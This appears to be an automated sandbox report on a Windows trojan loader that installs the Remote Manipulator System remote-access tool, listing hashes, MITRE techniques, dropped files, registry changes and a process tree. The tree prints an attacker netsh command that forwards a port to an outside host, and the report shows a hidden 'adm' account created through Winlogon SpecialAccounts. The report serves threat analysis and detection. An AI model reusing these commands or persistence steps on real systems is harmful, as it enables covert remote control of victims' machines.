rms | 3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4

Target

tmp/fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
Size

397KB
MD5

aff57ee1a4f3731c2036046910f78fb4
SHA1

ef9627c0cadff85a3dfaab6aef0b7c885f03b186
SHA256

3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4
SHA512

5ae93c6dae61782a7ac2fa2079df7006e0655d73e32fd7df1a5c1d44e47fd7dd2da225ea6f93e9d3dcb09be5f84b5dab2130bb4f2d5b0e05d95e866ebde0163f

Score

10^/10

rms discovery evasion persistence rat trojan

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

Blocklisted process makes network request 3 IoCs

flow	pid	Process
21	1496	msiexec.exe
23	1496	msiexec.exe
25	1496	msiexec.exe

Downloads MZ/PE file

Executes dropped EXE 8 IoCs

pid	Process
1000	RMS.exe
1572	installer.exe
2020	rutserv.exe
1820	rutserv.exe
1584	rutserv.exe
868	rutserv.exe
1044	rfusclient.exe
1852	rfusclient.exe

Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 4 IoCs

pid	Process
1000	RMS.exe
788	MsiExec.exe
868	rutserv.exe
868	rutserv.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe

Modifies WinLogon 2 TTPs 3 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0"	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe

Modifies powershell logging option 1 TTPs
evasion

Modify Registry
T1112

Drops file in Program Files directory 53 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrv_rms.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.ini	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\SampleClient.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\install.cmd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.gpd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\VPDAgent_x64.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\uninstall.cmd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrvui_rms.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrv_rms.hlp	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\RWLN.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\ntprint.inf	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisdecoder.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\webmmux.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.lng	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\uninstall.cmd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\vp8decoder.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Russian.lg	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmsui.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\stdnames_vpd.gpd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmspm.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.gpd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmsui.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\English.lg	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrv_rms.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\progress.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms_s.lng	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisencoder.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\fwproc.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmsui2.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\setupdrv.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.lng	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms_s.lng	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmspm.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unires_vpd.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.ini	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\EULA.rtf	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\RIPCServer.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\setupdrv.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\srvinst.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\VPDAgent.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrvui_rms.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unires_vpd.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\install.cmd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\stdnames_vpd.gpd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmsui2.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrv_rms.hlp	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\srvinst_x64.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\fwproc.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\progress.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\vp8encoder.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\ntprint.inf	msiexec.exe

Drops file in Windows directory 20 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exe	msiexec.exe
File created	C:\Windows\SoftwareDistribution\config.xml	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
File created	C:\Windows\Installer\f76bf69.msi	msiexec.exe
File created	C:\Windows\Installer\f76bf6b.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\ARPPRODUCTICON.exe	msiexec.exe
File created	C:\Windows\Installer\f76bf6d.msi	msiexec.exe
File created	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exe	msiexec.exe
File created	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\f76bf6b.ipi	msiexec.exe
File created	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_start_C00864331B9D4391A8A26292A601EBE2.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_start_C00864331B9D4391A8A26292A601EBE2.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\f76bf69.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC3A7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC637.tmp	msiexec.exe
File created	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\ARPPRODUCTICON.exe	msiexec.exe
File created	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exe	msiexec.exe
File opened for modification	C:\Windows\SoftwareDistribution\config.xml	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
File opened for modification	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exe	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Gathers network information 2 TTPs 6 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
892	NETSTAT.EXE
1528	NETSTAT.EXE
560	NETSTAT.EXE
656	NETSTAT.EXE
1380	NETSTAT.EXE
1620	NETSTAT.EXE

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\26	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25	msiexec.exe

Modifies registry class 24 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\InstanceType = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\7ZipSfx.000\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\36341E9D66DFD914D99C6C421757C5F9	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\ProductIcon = "C:\\Windows\\Installer\\{D9E14363-FD66-419D-9DC9-C62471755C9F}\\ARPPRODUCTICON.exe"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\PackageName = "rms.host6.3ru_mod.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\ProductName = "Remote Manipulator System - Host"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Language = "1049"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Version = "115998720"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media\1 = "DISK1;1"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\36341E9D66DFD914D99C6C421757C5F9\RMS	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\PackageCode = "EE22CCA5812A64F4CB23B29D2A4A798E"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17\36341E9D66DFD914D99C6C421757C5F9	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7ZipSfx.000\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\AuthorizedLUAApp = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList	msiexec.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
1572	installer.exe
1572	installer.exe
1572	installer.exe
1572	installer.exe
1572	installer.exe
1572	installer.exe
1496	msiexec.exe
1496	msiexec.exe
2020	rutserv.exe
2020	rutserv.exe
2020	rutserv.exe
2020	rutserv.exe
1820	rutserv.exe
1820	rutserv.exe
1584	rutserv.exe
1584	rutserv.exe
868	rutserv.exe
868	rutserv.exe
868	rutserv.exe
868	rutserv.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
Token: SeRestorePrivilege	1968	msiexec.exe
Token: SeTakeOwnershipPrivilege	1968	msiexec.exe
Token: SeSecurityPrivilege	1968	msiexec.exe
Token: SeDebugPrivilege	656	NETSTAT.EXE
Token: SeDebugPrivilege	1380	NETSTAT.EXE
Token: SeDebugPrivilege	1620	NETSTAT.EXE
Token: SeDebugPrivilege	892	NETSTAT.EXE
Token: SeDebugPrivilege	1528	NETSTAT.EXE
Token: SeDebugPrivilege	560	NETSTAT.EXE
Token: SeShutdownPrivilege	544	msiexec.exe
Token: SeIncreaseQuotaPrivilege	544	msiexec.exe
Token: SeRestorePrivilege	1496	msiexec.exe
Token: SeTakeOwnershipPrivilege	1496	msiexec.exe
Token: SeSecurityPrivilege	1496	msiexec.exe
Token: SeCreateTokenPrivilege	544	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	544	msiexec.exe
Token: SeLockMemoryPrivilege	544	msiexec.exe
Token: SeIncreaseQuotaPrivilege	544	msiexec.exe
Token: SeMachineAccountPrivilege	544	msiexec.exe
Token: SeTcbPrivilege	544	msiexec.exe
Token: SeSecurityPrivilege	544	msiexec.exe
Token: SeTakeOwnershipPrivilege	544	msiexec.exe
Token: SeLoadDriverPrivilege	544	msiexec.exe
Token: SeSystemProfilePrivilege	544	msiexec.exe
Token: SeSystemtimePrivilege	544	msiexec.exe
Token: SeProfSingleProcessPrivilege	544	msiexec.exe
Token: SeIncBasePriorityPrivilege	544	msiexec.exe
Token: SeCreatePagefilePrivilege	544	msiexec.exe
Token: SeCreatePermanentPrivilege	544	msiexec.exe
Token: SeBackupPrivilege	544	msiexec.exe
Token: SeRestorePrivilege	544	msiexec.exe
Token: SeShutdownPrivilege	544	msiexec.exe
Token: SeDebugPrivilege	544	msiexec.exe
Token: SeAuditPrivilege	544	msiexec.exe
Token: SeSystemEnvironmentPrivilege	544	msiexec.exe
Token: SeChangeNotifyPrivilege	544	msiexec.exe
Token: SeRemoteShutdownPrivilege	544	msiexec.exe
Token: SeUndockPrivilege	544	msiexec.exe
Token: SeSyncAgentPrivilege	544	msiexec.exe
Token: SeEnableDelegationPrivilege	544	msiexec.exe
Token: SeManageVolumePrivilege	544	msiexec.exe
Token: SeImpersonatePrivilege	544	msiexec.exe
Token: SeCreateGlobalPrivilege	544	msiexec.exe
Token: SeRestorePrivilege	1496	msiexec.exe
Token: SeTakeOwnershipPrivilege	1496	msiexec.exe
Token: SeRestorePrivilege	1496	msiexec.exe
Token: SeTakeOwnershipPrivilege	1496	msiexec.exe
Token: SeRestorePrivilege	1496	msiexec.exe
Token: SeTakeOwnershipPrivilege	1496	msiexec.exe
Token: SeRestorePrivilege	1496	msiexec.exe
Token: SeTakeOwnershipPrivilege	1496	msiexec.exe
Token: SeRestorePrivilege	1496	msiexec.exe
Token: SeTakeOwnershipPrivilege	1496	msiexec.exe
Token: SeRestorePrivilege	1496	msiexec.exe
Token: SeTakeOwnershipPrivilege	1496	msiexec.exe
Token: SeRestorePrivilege	1496	msiexec.exe
Token: SeTakeOwnershipPrivilege	1496	msiexec.exe
Token: SeRestorePrivilege	1496	msiexec.exe
Token: SeTakeOwnershipPrivilege	1496	msiexec.exe
Token: SeRestorePrivilege	1496	msiexec.exe
Token: SeTakeOwnershipPrivilege	1496	msiexec.exe
Token: SeRestorePrivilege	1496	msiexec.exe
Token: SeTakeOwnershipPrivilege	1496	msiexec.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1572	installer.exe
2020	rutserv.exe
1820	rutserv.exe
1584	rutserv.exe
868	rutserv.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 856 wrote to memory of 656	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	27
PID 856 wrote to memory of 656	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	27
PID 856 wrote to memory of 656	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	27
PID 656 wrote to memory of 1252	656	csc.exe	29
PID 656 wrote to memory of 1252	656	csc.exe	29
PID 656 wrote to memory of 1252	656	csc.exe	29
PID 856 wrote to memory of 1372	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	31
PID 856 wrote to memory of 1372	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	31
PID 856 wrote to memory of 1372	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	31
PID 856 wrote to memory of 792	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	34
PID 856 wrote to memory of 792	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	34
PID 856 wrote to memory of 792	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	34
PID 856 wrote to memory of 656	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	35
PID 856 wrote to memory of 656	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	35
PID 856 wrote to memory of 656	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	35
PID 856 wrote to memory of 1380	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	36
PID 856 wrote to memory of 1380	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	36
PID 856 wrote to memory of 1380	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	36
PID 856 wrote to memory of 1620	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	37
PID 856 wrote to memory of 1620	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	37
PID 856 wrote to memory of 1620	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	37
PID 856 wrote to memory of 1592	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	38
PID 856 wrote to memory of 1592	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	38
PID 856 wrote to memory of 1592	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	38
PID 856 wrote to memory of 1624	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	39
PID 856 wrote to memory of 1624	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	39
PID 856 wrote to memory of 1624	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	39
PID 856 wrote to memory of 1780	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	40
PID 856 wrote to memory of 1780	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	40
PID 856 wrote to memory of 1780	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	40
PID 856 wrote to memory of 1300	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	41
PID 856 wrote to memory of 1300	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	41
PID 856 wrote to memory of 1300	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	41
PID 856 wrote to memory of 1904	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	42
PID 856 wrote to memory of 1904	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	42
PID 856 wrote to memory of 1904	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	42
PID 856 wrote to memory of 892	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	43
PID 856 wrote to memory of 892	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	43
PID 856 wrote to memory of 892	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	43
PID 856 wrote to memory of 1528	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	44
PID 856 wrote to memory of 1528	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	44
PID 856 wrote to memory of 1528	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	44
PID 856 wrote to memory of 560	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	45
PID 856 wrote to memory of 560	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	45
PID 856 wrote to memory of 560	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	45
PID 856 wrote to memory of 1000	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	47
PID 856 wrote to memory of 1000	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	47
PID 856 wrote to memory of 1000	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	47
PID 856 wrote to memory of 1000	856	fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe	47
PID 1000 wrote to memory of 1572	1000	RMS.exe	48
PID 1000 wrote to memory of 1572	1000	RMS.exe	48
PID 1000 wrote to memory of 1572	1000	RMS.exe	48
PID 1000 wrote to memory of 1572	1000	RMS.exe	48
PID 1000 wrote to memory of 1572	1000	RMS.exe	48
PID 1000 wrote to memory of 1572	1000	RMS.exe	48
PID 1000 wrote to memory of 1572	1000	RMS.exe	48
PID 1572 wrote to memory of 544	1572	installer.exe	49
PID 1572 wrote to memory of 544	1572	installer.exe	49
PID 1572 wrote to memory of 544	1572	installer.exe	49
PID 1572 wrote to memory of 544	1572	installer.exe	49
PID 1572 wrote to memory of 544	1572	installer.exe	49
PID 1572 wrote to memory of 544	1572	installer.exe	49
PID 1572 wrote to memory of 544	1572	installer.exe	49
PID 1496 wrote to memory of 788	1496	msiexec.exe	51

C:\Users\Admin\AppData\Local\Temp\tmp\fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
"C:\Users\Admin\AppData\Local\Temp\tmp\fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe"
1⤵
- Modifies WinLogon
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:856
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\8f94smgx.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:656
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD450.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD440.tmp"
    3⤵
    PID:1252
- C:\Windows\system32\chcp.com
  "C:\Windows\system32\chcp.com" 437
  2⤵
  PID:1372
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:792
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:656
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:1380
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:1620
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy reset
  2⤵
  PID:1592
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:1624
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info
  2⤵
  PID:1780
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:1300
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:1904
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:892
